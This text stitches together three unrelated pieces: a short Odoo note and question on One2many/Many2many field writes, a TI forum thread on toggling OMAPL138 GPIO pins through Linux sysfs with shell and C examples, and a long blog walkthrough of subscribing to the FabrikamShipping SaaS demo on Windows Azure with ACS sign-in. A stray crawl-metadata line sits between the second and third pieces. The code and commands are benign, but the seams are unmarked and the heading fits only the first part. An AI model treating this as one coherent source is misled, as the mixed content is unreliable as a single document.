Many2many One2many Behavior
One2many and Many2many fields have some special behavior to be taken in account. At that time (this may change at release) using create on a multiple relation fields will not introspect to look for the relation.
self.line_ids.create({'name': 'Tho'}) # this will fail as order is not set
self.line_ids.create({'name': 'Tho', 'order_id': self.id}) # this will work
self.line_ids.write({'name': 'Tho'}) # this will write all related lines
Both fields are in the view xml?
Yes, I can see both fields and they are defined in the res.partner view. I use _inherit='res.partner' in my model to add new elements. But those two fields both stay untouched. I really would like to know why I cannot write into child.website. Thanks for your reply.
Hi,
I have some quarries on GPIO for OMAPL138 LINUX-2.6.33.
1.) Please provide the user usage information of GPIO driver, on Linux-2.6.33.
2.) How to access GPIO pin on user side like gpio_request(); gpio_request_input(); etc
3.) what are the user API for accessing the gpio. for linx application.
4.) And i checked the /sys/class/gpio is present .
Thanks in adv
Ram
Hi Ram,
Go through kernel documentation "Documentation/gpio.txt" for more details
Regards
AnilKumar
Noticed in your other forum threads that you have some confusion between the kernel and user space interfaces to GPIOs. User space access to the sysfs GPIO driver is all through files. Here's an example of toggling GPIO 11 in a Linux console or terminal:
cd /sys/class/gpio
echo 11 > export
cd gpio11
echo out > direction
echo 0 > value
echo 1 > value
echo 0 > value
The equivalent code in C is:
#include <fcntl.h>   /* For open() */
#include <unistd.h>  /* For write(), close() */

int main(int argc, char *argv[])
{
    int fd;

    fd = open("/sys/class/gpio/export", O_WRONLY);
    write(fd, "11", 3); // Include null!
    close(fd);

    fd = open("/sys/class/gpio/gpio11/direction", O_WRONLY);
    write(fd, "out", 4);
    close(fd);

    fd = open("/sys/class/gpio/gpio11/value", O_WRONLY);
    write(fd, "0", 2);
    write(fd, "1", 2);
    write(fd, "0", 2);
    close(fd);

    return 0;
}
Please take note that you must check that the GPIO line you want to use is pinmux'ed to an external pin. That involves looking at the kernel code and possibly modifiying the kernel.
Thanks for your above example to toggle gpio....
Hi, if I want set GP2[3] to out direction .And set it to 1 or 0, how can I use the function write and open?\
fd = open("/sys/class/gpio/export", O_WRONLY);
write(fd, "??", ??); // Include null!
close(fd);

fd = open("/sys/class/gpio/gpio11/direction", O_WRONLY);
write(fd, "??", ??);
close(fd);

fd = open("/sys/class/gpio/gpio11/value", O_WRONLY);
write(fd, "0", ??);
write(fd, buf, len);
fd - file pointer
buf - contains characters ex: "1" or "0" or "in" or "out"
len - length of the buffer ex: 2 or 2 or 3 or 4.
Please mark this Forum post as answered via the Verify Answer button below if it helps answer your question. Thanks!
Hi,
#include <fcntl.h>   /* For open() */
#include <unistd.h>  /* For write(), close() */

int main(int argc, char *argv[])
{
    int fd;
    fd = open("/sys/class/gpio/export", O_WRONLY);
    write(fd, "11", 3); // Include null!
what's the meaning of write(fd, "11", 3); // Include null!
He
This means writing the string "11" into the export file (the length 3 includes the terminating null).
Hi AnilKumar
I don't know what the "11" mean. if i want control GP1[1], in the OMAPL138 datasheet:
GPIO Register Bits and Banks Associated With GPIO Signals
GPIO Pin Number | GPIO Signal Name | Bank Number | Control Registers | Register Bit | Register Field
--------------- | ---------------- | ----------- | ----------------- | ------------ | --------------
1               | GP0[0]           | 0           | register_name01   | Bit 0        | GP0P0
2               | GP0[1]           | 0           | register_name01   | Bit 1        | GP0P1
...             | ...              | ...         | ...               | ...          | ...
18              | GP1[1]           | 1           | register_name01   | Bit 17       | GP1P1
Can I use it like this write(fd,“18",3) ? right?
int fd;

fd = open("/sys/class/gpio/export", O_WRONLY);
write(fd, "18", 3); // Include null!
close(fd);

fd = open("/sys/class/gpio/gpio18/direction", O_WRONLY);
write(fd, "out", 4);
close(fd);

fd = open("/sys/class/gpio/gpio18/value", O_WRONLY);
while (1) {
    write(fd, "0", 2);
    sleep(3);
    write(fd, "1", 2);
    sleep(3);
}
close(fd);
When I detect the pin GP1[1], I can't get the value I set to it . Why?
Hi He,
The way you are using are correct,
Make sure that pinmux settings are proper, refer OMAPL138 GPIO user guide for more details
Below post will help you on GPIO functionality.
Hi AnilKumar,
Thank you for your quick reply. But I still have problems finding the pinmux setting function.
After rebuilding the kernel, when I detect the pin GP1[1], I still can't get the value I set on it. Am I doing something wrong? Is there any other place I must modify?
Hi Ram
Did you solve your problem? I have the same problems as you.
Did you succeed in setting the pinmux? How did you do it?
Below are my problems.
Hi Norman,
I have some troubles with the pinmux settings. After rebuilding the kernel, when I detect the pin GP1[1], I still can't get the value I set on it. Am I doing something wrong? Is there any other place I must modify?

Regards
He
Make sure that you have written the correct value to corresponding register
Hi Anil
I do it like this:
~# echo 18 > /sys/class/gpio/export
~# ls /sys/class/gpio/gpio18
active_low  direction  edge  power  subsystem  uevent  value
~# echo out > /sys/class/gpio/gpio18/direction
~# echo 0 > /sys/class/gpio/gpio18/value
~# cat /sys/class/gpio/gpio18/value
1
~# echo 1 > /sys/class/gpio/gpio18/value
~# cat /sys/class/gpio/gpio18/value
1
~# echo 0 > /sys/class/gpio/gpio18/value
~# cat /sys/class/gpio/gpio18/value
1

Why can the value not be changed? When I use "echo 29 > /sys/class/gpio/export", the gpio29 value changes as I set it.
The file 'value' is R/W.
Did you call "davinci_cfg_reg(gpio_pin)" to set pinmux for gpio18 besides adding entries in mux.h and da850.c?
BTW, gpio1[1] is gpio17 instead of gpio18.
Regards,
Yan
Make sure that you are configuring the same GPIO pin.
You are trying to add pinmux for GPIO1_1 (the 18th GPIO pin), which is gpio 17, in your previous post.
Here you are changing the value of gpio 18 (the 19th pin); use the same GPIO number in both places.
Can you check these
echo 17 > /sys/class/gpio/export
echo "out" > /sys/class/gpio/gpio17/direction
echo 0 > /sys/class/gpio/gpio17/value
echo 1 > /sys/class/gpio/gpio17/value
Note: Can you check the status of pinmux register after kernel boots. | http://e2e.ti.com/support/embedded/linux/f/354/p/156212/574819.aspx | CC-MAIN-2013-20 | refinedweb | 962 | 64.71 |
This is a C++ program to implement the Boyer-Moore string-matching algorithm.
Here is source code of the C++ Program to Implement Boyer-Moore Algorithm for String Matching. The C++ program is successfully compiled and run on a Linux system. The program output is also shown below.
/* Program for Bad Character Heuristic of Boyer Moore String Matching Algorithm */
# include <limits.h>
# include <string.h>
# include <stdio.h>
# define NO_OF_CHARS 256
// A utility function to get maximum of two integers
int max(int a, int b)
{
return (a > b) ? a : b;
}
// The preprocessing function for Boyer Moore's bad character heuristic
void badCharHeuristic(char *str, int size, int badchar[NO_OF_CHARS])
{
int i;
// Initialize all occurrences as -1
for (i = 0; i < NO_OF_CHARS; i++)
badchar[i] = -1;
// Fill the actual value of last occurrence of a character
for (i = 0; i < size; i++)
badchar[(int) str[i]] = i;
}
void search(char *txt, char *pat)
{
int m = strlen(pat);
int n = strlen(txt);
int badchar[NO_OF_CHARS];
badCharHeuristic(pat, m, badchar);
int s = 0; // s is shift of the pattern with respect to text
while (s <= (n - m))
{
int j = m - 1;
while (j >= 0 && pat[j] == txt[s + j])
j--;
if (j < 0)
{
printf("\n pattern occurs at shift = %d", s);
s += (s + m < n) ? m - badchar[txt[s + m]] : 1;
}
else
s += max(1, j - badchar[txt[s + j]]);
}
}
/* Driver program to test above function */
int main()
{
char txt[] = "ABAAABCD";
char pat[] = "ABC";
search(txt, pat);
return 0;
}
Output:
$ g++ Boyer-Moore.cpp
$ ./a.out
 pattern occurs at shift = 4

------------------
(program exited with code: 0)
Press return to continue
Sanfoundry Global Education & Learning Series – 1000 C++ Programs.
Here’s the list of Best Reference Books in C++ Programming, Data Structures and Algorithms. | https://www.sanfoundry.com/cpp-program-implement-boyer-moore-algorithm-string-matching/ | CC-MAIN-2018-13 | refinedweb | 288 | 58.11 |
It has been a bit less than 4 years since I first heard the term serverless and only around 3 years since I got my hands dirty with it. As a beginner, I agreed that it meant fewer servers to manage, but everything else was more. It was more complex to build event-driven serverless applications, harder to secure as serverless shifts security responsibilities to developers, and harder to achieve observability as events go in and out between services simultaneously. Since then, many of those problems have been tackled with the innovation of great products. However, one thing remains constant: the learning curve is very steep, and serverless is far from easy.
Serverless as it’s meant to be
That’s what made me passionate about the Serverless Cloud when Jeremy first told me about it. We are calling our innovation "serverless as it’s meant to be" and it really is. It gives developers the ability to build Express.js-like APIs with a familiar syntax for accessing built-in data and secrets, and for building scheduled tasks. All the infrastructure is automatically spun up and abstracted away. You need to focus on the code and only the code. Our own Doug Moscrop coined this infrastructure-from-code, and very recently Shawn Wang laid out a similar vision and called it the self-provisioning runtime. Last week, we came out of beta and moved into the exclusive launch of the Serverless Cloud. The comments so far are so great that it puts pressure on us to keep the Serverless Cloud as lean and as efficient as possible.
Mike Lamb (@letslamb), 07 Sep 2021:
"@goserverless Serverless Cloud is so awesome. Can’t wait to finish up this little bit of client work so I can get back to playing with it & send more feedback. What a time to be in tech"
Serverless Data
Serverless Cloud leads an opinionated paradigm not only for APIs but also for the databases of modern applications. After watching Rick Houlihan's great talk and reading Alex DeBrie's great book, I was sold on single-table design for many use cases. However, incorporating best practices into your data layer is easier said than done. The great news is that all of those best practices are already baked into Serverless Data, thanks to Jeremy's previous experience with OSS work. You can manipulate Serverless Data simply by using get and set commands. You can define namespaces on the fly for your data and query with conditional operators. You can use labels to pivot and access your data for different views. In this way, you can add another dimension to your K/V storage and retrieve accordingly. See the docs for more information. I strongly recommend watching the chat between Rick Houlihan and Jeremy about the thought process behind the implementation of Serverless Data.
The future of Serverless Cloud
A continuous flow of feedback from multiple sources is every product manager's dream, and I'm currently living it. I’m really grateful for the buzz on social media about Serverless Cloud as it helped us look from different angles at our own product. Even before that, early beta users were helping tremendously to shape our features. We are not sticking to a long term roadmap, but there are several features that we’ll definitely add in the near future.
First of all, Serverless Cloud can’t be without events! We’ll be adding several event types to Serverless Cloud, like triggering functions on a record update and for inter- and intra-service communication. Second, we’ll give our users the ability to assign custom domains so you can share your Serverless Cloud applications with the world. Third, we’ll make the portability of existing Express apps easier so that you can migrate existing app into the Serverless Cloud with minimal effort.
Wrapping up
Software means something as long as it serves its business objectives. We want to let developers get rid of anything that distracts them from focusing on the business logic. We are still early, but we envision a world where all the infrastructure can be inferred from code. Serverless Cloud is ready for developers to build applications and deliver value to end users in the fastest way possible. We have granted access for a limited number of users in the scope of our exclusive launch and we’ll start to put newcomers on to the waitlist soon. If you want to be part of this journey, get your seat in our exclusive launch before it ends.
Discussion (0) | https://practicaldev-herokuapp-com.global.ssl.fastly.net/emrahsamdan/to-the-future-with-serverless-cloud-379k | CC-MAIN-2022-21 | refinedweb | 764 | 61.36 |
DES_CRYPT(3) Linux Programmer's Manual DES_CRYPT(3)
des_crypt, ecb_crypt, cbc_crypt, des_setparity, DES_FAILED - fast DES encryption
#include <rpc/des_crypt.h>

int ecb_crypt(char *key, char *data, unsigned int datalen,
              unsigned int mode);
int cbc_crypt(char *key, char *data, unsigned int datalen,
              unsigned int mode, char *ivec);
void des_setparity(char *key);
int DES_FAILED(int status);
4.3BSD. Not in POSIX.1.
des(1), crypt(3), xcrypt(3)
This page is part of release 5.11 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. 2021-03-22 DES_CRYPT(3)
Pages that refer to this page: encrypt(3), xcrypt(3) | https://man7.org/linux/man-pages/man3/cbc_crypt.3.html | CC-MAIN-2021-25 | refinedweb | 104 | 67.65 |
Introduction
In this article we will learn some basics of ASP.Net MVC applications. In my last
article you read a lot about ASP.Net MVC. You can read those articles from the links given below.
After reading the previous articles I think
you are now aware of ASP.Net MVC. So let's see some basic structures of ASP.Net
MVC applications. In this article we will see how to start an ASP.Net MVC
application. What are the prerequisites? And how to display a simple graph in ASP.Net MVC.

Prerequisites
As you know ASP.Net MVC is available in various versions like MVC1, MVC2, and
MVC3 etc. In this article we are using MVC3. So download the MVC3 from here.
Starting an ASP.Net MVC Application
After installing ASP.Net MVC3 we can create our new ASP.Net MVC3 application so
let's open your Visual Studio and select ASP.NET MVC3 Web Application from the
new project dialog as shown in the following screenshot.
After selecting ASP.NET MVC3 Web Application it will display one more screen to
select your view engine and type of application like empty website, Internet and
Intranet so in this screen select Empty and in the view engine select aspx view
engine; here we have one more view engine i.e. razor as well as we have one more
advanced support to use HTML5 as markup language.
From the above screen we have to select Empty application and ASPX as our view
engine as well check the chechbox to use HTML5 semantic markup. After this
selection our application is created and the one predefined structure is
available; just open the Solution Explorer and see the structure.
In the above screen you can see already some folders are created with
Controllers, Models and Views. Now our task is create first one controller so
let's create it by right-click and select add controller option which will ask
the name of controller like shown in the following screen.
Here note the MVC naming convention for controllers. You can see I've added GraphController as the name for the controller; you can change it as you want, but keep in mind your controller name must be suffixed with the word Controller. After adding this controller you can see the default Index method is available in the controller, and this GraphController is extended from the base Controller class.

public class GraphController : Controller
{
    //
    // GET: /Graph/
    public ActionResult Index()
    {
        return View();
    }
}
From the above steps now you know how to create MVC applications and add
the controller to the application. Next we have to add a view related to the methods
present in the controller. So add one view for the index method to show on startup
which will contain one ActionLink to display the graph. To add a view, right-click
inside the method and select Add View as shown below.
From the above screen you see how to add a view to an ASP.NET MVC application.
Now whenever we call any method then the respective view will be rendered in
the client browser. You can keep the ActionLink in Index.aspx using the following line of code:

<%= Html.ActionLink("View Graph", "Graph") %>
In the above line you can see we have created a Html.ActionLink which takes View Graph
and Graph as arguments; here View Graph is the text given to display and Graph is
the action name in the controller. Next we will see how to prepare the graph; for
this task we must add one more method in GraphController with the name
Graph, so copy and paste this method into GraphController:

public ActionResult Graph()
{
    string[] _xval = { "vulpes", "Sp Nayak", "Krishna", "Datta Kharad", "Prabhu Raja" };
    string[] _yval = { "235", "130", "30", "25", "15" };

    // here the chart is going on
    var bytes = new Chart(width: 600, height: 300)
        .AddSeries(
            chartType: "Column",
            legend: "Mindcracker Current Month Runner up",
            xValue: _xval,
            yValues: _yval)
        .GetBytes("png");

    return File(bytes, "image/png");
}
Before adding this method to the controller we need to add a using statement for System.Web.Helpers, which contains the Chart class. In the above method you can see we have created a string[] which is nothing but the data for our graph, and we have created a chart which takes some arguments like the chart type, legend, and the values to display on the graph; this method returns a File of bytes.

Configure Routing
When we create any MVC application our default routing is configured like below.

public static void RegisterRoutes(RouteCollection routes)
{
    routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

    routes.MapRoute(
        "Default", // Route name
        "{controller}/{action}/{id}", // URL with parameters
        new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults
    );
}
Here it will consider the default controller to be Home, but since this is an empty application we don't have a Home controller, so we need to replace the default Home controller with our Graph controller; just change Home to Graph like below.

public static void RegisterRoutes(RouteCollection routes)
{
    routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

    routes.MapRoute(
        "Default", // Route name
        "{controller}/{action}/{id}", // URL with parameters
        new { controller = "Graph", action = "Index", id = UrlParameter.Optional } // Parameter defaults
    );
}

Output
The output will look like the following screen.

Conclusion
In this way we can start working with ASP.Net MVC and easily prepare a graph for an MVC application.
Display Graph in ASP.NET MVC
Routing in MVC
Thanks Aaron. I used var because Chart returns the byte of image and var can be any type.
Nicely explained.
Thanks guys
understandable........thank you very much for sharing....
Very nicely presented article. | http://www.c-sharpcorner.com/UploadFile/krishnasarala/display-graph-in-Asp-Net-mvc/ | crawl-003 | refinedweb | 931 | 65.62 |
The hack package
Hack: a Haskell Webserver Interface
Readme for hack-2009.10.30
Hack: a Haskell Webserver Interface
Hack is a port of Ruby's Rack webserver interface, which itself was inspired by Python's WSGI.
Version
2009.10.30
Introduction
Idea
Separation of concerns:
- hack: interface spec
- hack-middleware: building blocks
- hack-handler: server backends
Design
type Application = Env -> IO Response
Demo
import Hack
import Hack.Handler.Happstack
import Data.ByteString.Lazy.Char8 (pack)

app :: Application
app = \env -> return $ Response
    200
    [ ("Content-Type", "text/plain") ]
    (pack "Hello World")

main = run app
- remoteHost: The remote host of this request
- http: http headers, intended to be used by handlers and middleware.
- hackCache: High performance cache, could be used by handlers and middleware.
pick a backend
cabal install hack-handler-happstack
Create a Hack app
put the following code in src/Main.hs:
import Hack
import Hack.Handler.Happstack
import Data.ByteString.Lazy.Char8 (pack)

app :: Application
app = \env -> return $ Response
    { status  = 200
    , headers = [ ("Content-Type", "text/plain") ]
    , body    = pack "Hello World"
    }

main = run app
run
ghc --make -O2 Main.hs
./Main
It should be running on now.
Middleware
demo usage of middleware
install hack-contrib:
cabal install happy
cabal install hack-contrib
put the following in Main.hs. This code uses the URLMap middleware to route both /hello and /there to the hello application.
import Hack
import Hack.Handler.Happstack
import Hack.Contrib.Utils
import Hack.Contrib.Middleware.URLMap
import Data.ByteString.Lazy.Char8 (pack)
import Data.Default

hello :: Application
hello = \env -> return $ def { body = pack $ show env, status = 200 }

app :: Application
app = url_map [("/hello", hello), ("/there", hello)]
cabal install linked_lib --reinstall | https://hackage.haskell.org/package/hack-2009.10.30 | CC-MAIN-2016-40 | refinedweb | 310 | 50.43 |
There exists a small but measurable performance hit for at least one
test case (using Int as keys, obviously). Perhaps the bias would be the
other way if we were comparing EnumMap to an IntMap wrapped with
to/from Enum.

Thomas

-- Using Data.IntMap
[tommd at Mavlo Test]$ ghc --make -O2 im.hs
[1 of 1] Compiling Main             ( im.hs, im.o )
Linking im ...
[tommd at Mavlo Test]$ ./im
buildMap:       0.625563s
lookupMap:      0.176478s
[tommd at Mavlo Test]$ ./im
buildMap:       0.613668s
lookupMap:      0.174151s
[tommd at Mavlo Test]$ ./im
buildMap:       0.607961s
lookupMap:      0.175584s

-- Using Data.EnumMap
[tommd at Mavlo Test]$ vi im.hs
[tommd at Mavlo Test]$ ghc --make -O2 im.hs
[1 of 1] Compiling Main             ( im.hs, im.o )
Linking im ...
[tommd at Mavlo Test]$ ./im
buildMap:       0.705458s
lookupMap:      0.229307s
[tommd at Mavlo Test]$ ./im
buildMap:       0.71757s
lookupMap:      0.231273s
[tommd at Mavlo Test]$ ./im
buildMap:       0.685333s
lookupMap:      0.23883s

Code (sorry, it's ugly, I know):

{-# LANGUAGE BangPatterns #-}
module Main where

import Data.Time
import qualified Data.EnumMap as E
type IntMap = E.EnumMap Int
-- import qualified Data.IntMap as E
-- type IntMap = E.IntMap

main = do
  bench "buildMap" buildMap
  !e <- buildMap
  bench "lookupMap" (lookupMap e)

bench str func = do
  start <- getCurrentTime
  !x <- func
  finish <- getCurrentTime
  let diff = diffUTCTime finish start
  putStrLn $ str ++ ":\t" ++ (show diff)

keys = [0..1000000]

buildMap :: IO (IntMap Int)
buildMap = do
  return $ go keys keys E.empty
  where
  go [] _ !m = m
  go _ [] !m = m
  go (k:ks) (e:es) m = go ks es (E.insert k e m)

lookupMap m = do
  check keys m
  where
  check [] _ = return ()
  check (k:ks) m =
    if (E.lookup k m /= Just k)
      then error "blah"
      else check ks m

On Sat, Aug 8, 2009 at 4:02 PM, John Van Enk <vanenkj at gmail.com> wrote:
> What if we say that Enum is a generalization, rather than a wrapper, of Int?
>
> If the benchmarks are even, is there a reason to use the more specific
> structure rather than the general one?
> I don't know if Enum being "more complex" outweighs the benefits of it
> being "more general" (if the EnumMap matches IntMap for speed).
>
> Thoughts?
>
> On Sat, Aug 8, 2009 at 6:11 PM, Henning Thielemann
> <lemming at henning-thielemann.de> wrote:
>>
>> .
>>
> _______________________________________________
> Haskell-Cafe mailing list
> Haskell-Cafe at haskell.org
>
It’s been a few months since we pulled the wraps off FabrikamShipping SaaS, and the response (example here) has been just great: I am glad you guys are finding the sample useful!
In fact, FabrikamShipping SaaS contains really a lot of interesting stuff and I am guilty of not having found the time to highlight the various scenarios, lessons learned and reusable little code gems it contains. Right now, the exploratory material is limited to the intro video, the recording of my session at TechEd Europe and the StartHere pages of the source code & enterprise companion packages.
We designed the online demo instance and the downloadable packages to be as user-friendly as we could, and in fact we have tens of people creating tenants every day, but it’s undeniable that some more documentation may help to zero in on the most interesting scenarios. Hence, I am going to start writing more about the demo. Sometimes we’ll dive very deep into code and architecture; at other times we’ll stay at a higher level.
I’ll begin by walking you through the process of subscribing to a small business edition instance of FabrikamShipping: the beauty of this demo angle is that all you need to experience it is a browser, an internet connection and one or more accounts at Live, Google or Facebook. Despite of the nimble requirements, however, this demo path demonstrates many important concepts for SaaS and cloud based solutions: in fact, I am told it is the demo that most often my field colleagues use in their presentations, events and engagements.
Last thing before diving in: I am going to organize this as instructions you can follow for going thru the demo, almost as a script, so that you can get the big picture reasonably fast; I will expand on the details on later posts.
Subscribing to a Small Business Edition instance of FabrikamShipping
Let’s say that today you are Adam Carter: you work for Contoso7, a fictional startup, and you are responsible for the logistic operations. Part of the Contoso7 business entails sending products to their customers, and you are tasked with finding a solution for handling Contoso7’s shipping needs. You have no resources (or desire) to maintain software in-house for a commodity function such as shipping, hence you are on the hunt for a SaaS solution that can give you what you need just by pointing your browser to the right place.
Contoso7 employees are mostly remote; furthermore, there is a seasonal component in Contoso7 business which requires a lot of workers in the summer and significantly less stuff in the winter. As a result, Contoso7 does not keep accounts for those workers in a directory, but asks them to use their email and accounts from web providers such as Google, Live Id, or even Facebook.
In your hunt for the right solution, you stumble on FabrikamShipping: it turns out they offer a great shipping solution, delivered as a monthly subscription service to a customized instance of their application. The small business edition is super-affordable, and it supports authentication from web providers. It’s a go!
You navigate to the application home page at, and sign up for one instance.
As mentioned, the Small Business Edition is the right fit for you; hence, you just click on the associated button.
Before everything else, FabrikamShipping establishes a secure session: in order to define your instance, you'll have to input information you may not want to share too widely! FabrikamShipping also needs to establish a business relationship with you: if you successfully complete the onboarding process, the identity you use here will be the one associated with all the subscription administration activities.
You can choose to sign in from any of the identity providers offered above. FabrikamShipping trusts ACS to broker all its authentication needs: in fact, the list of supported IPs comes directly from the FabrikamShipping namespace in ACS. Pick any IP you like!
In this case, I have picked a Live ID. Note for the demoers: the identity you use at this point is associated with your subscription, and is also the way in which FabrikamShipping determines which instance you should administer when you come back to the management console. You can have only one instance associated with one identity, hence once you create a subscription with this identity you won't be able to re-use the same identity for creating a NEW subscription until the tenant gets deleted (typically every 3 days).
Once you have authenticated, FabrikamShipping starts the secure session in which you'll provide the details of your instance. The sequence of tabs you see on top of the page represents the sequence of steps you need to go through: the FabrikamShipping code contains a generic provisioning engine which can adapt to different provisioning processes to accommodate multiple editions, and it sports a generic UI engine which can adapt to it as well. The flow here is specific to the small business edition.
The first screen gathers basic information about your business: the name of the company, the email address at which you want to receive notifications, which Windows Azure data center you want your app to run on, and so on. Fill the form and hit Next.
In this screen you can define the list of the users that will have access to your soon-to-appear application instance for Contoso7.
Users of a Small Business instance authenticate via web identity providers: this means that at authentication time you won't receive a whole lot of information in the form of claims; sometimes you'll just get an identifier. However, in order to operate the shipping application every user needs some profile information (name, phone, etc.) and a level of access to be granted to the application features (i.e., roles).
As a result, you as the subscription administrator need to enter that information about your users; furthermore, you need to specify for every user a valid email address so that FabrikamShipping can generate invitation emails with activation links in them (more details below).
In this case, I am adding myself (i.e. Adam Carter) as an application user (the subscription administrator is not added automatically) and using the same Hotmail account I used before. Make sure you use an email address you actually have access to, or you won't receive the notifications you need for moving forward in the demo. Once you have filled in all the fields, you can click Add as New for adding the entry to the users' list.
For good measure I always add another user for the instance, typically with a Gmail or Facebook account. I like the idea of showing that the same instance of a SaaS app can be accessed by users coming from different IPs, something that before the rise of social networks would have been considered weird at best.
Once you are satisfied with your list of users, you can click Next.
The last screen summarizes your main instance options: if you are satisfied, you can hit Subscribe and get FabrikamShipping to start the provisioning process which will create your instance.
Note: in a real-life solution this would be the moment to show the color of your money. FabrikamShipping is nicely integrated with the Adaptive Payment APIs and demonstrates both explicit payments and automated, preapproved charging from Windows Azure. I think it is really cool, and that it deserves a dedicated blog post: also, in order to work it requires you to have an account with the PayPal developer sandbox, hence it would add steps to the flow: more reasons to defer it to another post.
Alrighty, hit Subscribe!
FabrikamShipping thanks you for your business, and tells you that your instance will be ready within 48 hours. In reality that's the SLA for the enterprise edition, which I'll describe in another post; for the Small Business one we are WAAAY faster. If you click on the link for verifying the provisioning status, you'll have proof.
Here you enter the Management Console: now you are officially a Fabrikam customer, and you get to manage your instance.
The workflow you see above is, once again, a customizable component of the sample: the Enterprise edition one would be muuuch longer. In fact, you can just hit F5 a few times and you’ll see that the entire thing will turn green in typically less than 30 seconds. That means that your Contoso7 instance of FabrikamShipping is ready!
Now: what happened in those few seconds between hitting Subscribe and the workflow turning green? Quite a lot. The provisioning engine creates a dedicated instance of the app database in SQL Azure, creates the database of the profiles and the various invitation tickets, adds the proper entry in the Windows Azure store which tracks tenants and options, creates dedicated certificates and uploads them to ACS, creates entries in ACS for the new relying party and issuer, sends email notifications to the subscriber and invites to the users, and many other small things which are needed for presenting Contoso7 with a personalized instance of FabrikamShipping. There are so many interesting things taking place there that for this too we'll need a specific post. The bottom line here is: the PaaS capabilities offered by the Windows Azure platform are what made it possible for us to put together something as sophisticated as this as a sample, instead of requiring the armies of developers you'd need for implementing features like the ones above from scratch. With the management APIs from Windows Azure, SQL Azure and ACS we can literally build the provisioning process as if we were playing with Lego blocks.
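The step-by-step engine described above boils down to running a list of provisioning actions in order while recording per-step status. Here is a hedged Python sketch of that idea; every name below is made up for illustration (the real engine is C# driving the Windows Azure, SQL Azure and ACS management APIs):

```python
# Hypothetical stub steps; in the real sample these call cloud management APIs.
def create_tenant_database(tenant): return "db-%s" % tenant
def create_profile_store(tenant): return "profiles-%s" % tenant
def register_tenant_record(tenant): return True
def configure_acs_relying_party(tenant): return True
def send_notifications(tenant): return True

STEPS = [
    ("Create tenant database", create_tenant_database),
    ("Create profile store", create_profile_store),
    ("Register tenant record", register_tenant_record),
    ("Configure ACS relying party", configure_acs_relying_party),
    ("Send notifications", send_notifications),
]

def provision(tenant):
    """Run the steps in order, recording per-step status -- this status
    list is what a management-console workflow view could poll."""
    status = []
    for name, step in STEPS:
        try:
            step(tenant)
            status.append((name, "completed"))
        except Exception as exc:
            status.append((name, "failed: %s" % exc))
            break  # stop at the first failing step
    return status
```

Calling `provision("contoso7")` walks all the steps and marks each completed; a failing step stops the run, which is why a console can show partial progress turning green one box at a time.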
Activating One Account and Accessing the Instance
The instance is ready. Awesome! Now, how to start using it? The first thing Adam needs to do is check his email.
Above you can see that Adam received two mails from FabrikamShipping: let’s take a look to the first one.
The first mail informs Adam, in his capacity as subscription manager, that the instance he paid for is now ready to start producing a return on investment. It provides the address of the instance, which in good SaaS tradition is of the form http://<applicationname>/<tenant>, and explains how the instance works: here's the instance address, your users all received activation invitations, this is just a sample hence the instance will be gone in a few days, and so on. Great. If we want to start using the app, Adam needs to drop the subscription manager hat and pick up the application user one. For this, we need to open the next message.
This message is for Adam the user. It contains a link to an activation page (in fact we are using MVC) which will take care of associating the record in the profile with the token Adam will use for the sign-up. As you can imagine, the activation link is unique for every user and becomes useless once it has been used. Let's click on the activation link.
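The single-use activation ticket mechanism described here is easy to sketch (hypothetical Python, not the sample's actual MVC code; names are illustrative): issue an unguessable ticket per invited user, and void it on first redemption.

```python
import secrets

class ActivationStore(object):
    """Hypothetical one-time activation tickets: unique per invited
    user, and useless after the first click."""
    def __init__(self):
        self._tickets = {}                   # ticket -> user email

    def issue(self, email):
        ticket = secrets.token_urlsafe(16)   # unguessable link component
        self._tickets[ticket] = email
        return ticket

    def redeem(self, ticket):
        # pop() voids the ticket: a second click finds nothing
        return self._tickets.pop(ticket, None)
```

The first redemption returns the invited user's email (so the profile record can be bound to the incoming token); any later attempt gets nothing.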
Here we are already on the Contoso7 instance, as you can see from the logo (here I uploaded a random image (not really random, it’s the logo of my WP7 free English-Chinese dictionary app (in fact, it’s my Chinese seal
))). Once again, the list of identity providers is rendered from a list dynamically provided by ACS: although ACS provides a ready-to-use page for picking IPs, the approach shown here allows Fabrikam to maintain a consistent look and feel and give continuity of experience, customize the message to make the user aware of the significance of this specific step (sign-up), and so on. Take a peek at the source code to see how that's done.
Let’s say that Adam picks Live ID: as he is already authenticated with it from the earlier steps, the association happens automatically.
The page confirms that the current account has been associated with the profile; to prove it, we can now finally access the Contoso7 instance. We can go back to the mail and follow the provided link, or use the link in the page here directly.
This is the page every Contoso7 user will see when landing on their instance: it may look very similar to the sign-up page above, but notice the different message clarifying that this is a sign-in screen.
As Adam is already authenticated with Live ID, as soon as he hits the link he gets redirected to ACS, gets a token and uses it to authenticate with the instance. Behind the scenes, Windows Identity Foundation uses a custom ClaimsAuthenticationManager to shred the incoming token: it verifies that the user is accessing the right tenant (tenant isolation is king), then retrieves from SQL Azure the profile data and adds them as claims in the current context (there are solid reasons for which we store those at the RP side; once again, stuff for another post). As a result, Adam gets all his attributes and roles rehydrated in the current context and the app can take advantage of claims-based identity for customizing the experience and restricting access as appropriate. In practical terms, that means that Adam's sender data are pre-populated, and that Adam can do pretty much what he wants with the app, since he is in the Shipping Manager role that he self-awarded to his user at subscription time.
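The actual sample implements this enrichment in C# with a custom WIF ClaimsAuthenticationManager; as a language-neutral sketch (hypothetical Python, with a dictionary standing in for the SQL Azure profile store), the per-request logic amounts to:

```python
# Hypothetical stand-in for the profile store; keys are
# (tenant, user identifier) pairs, values are profile attributes.
PROFILES = {
    ("contoso7", "adam@example.com"): {"name": "Adam Carter",
                                       "role": "Shipping Manager"},
}

def enrich(token_claims, url_tenant):
    """Verify tenant isolation, then add stored profile data as claims."""
    if token_claims["tenant"] != url_tenant:
        raise PermissionError("token was issued for a different tenant")
    profile = PROFILES.get((url_tenant, token_claims["nameid"]))
    if profile is None:
        raise PermissionError("no profile for this user in this tenant")
    claims = dict(token_claims)
    claims.update(profile)   # name, role, ... now live in the context
    return claims
```

With this in place the application never sees a bare identifier: by the time request processing starts, the context already carries the name and role needed to customize the UI and gate features.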
In less than 5 minutes, if he is a fast typist, Adam got for his company a shipping solution; all the users already received instructions on how to get started, and Adam himself can already send packages around. Life is good!
Works with Google, too! And all the Others*
*in the Lost sense
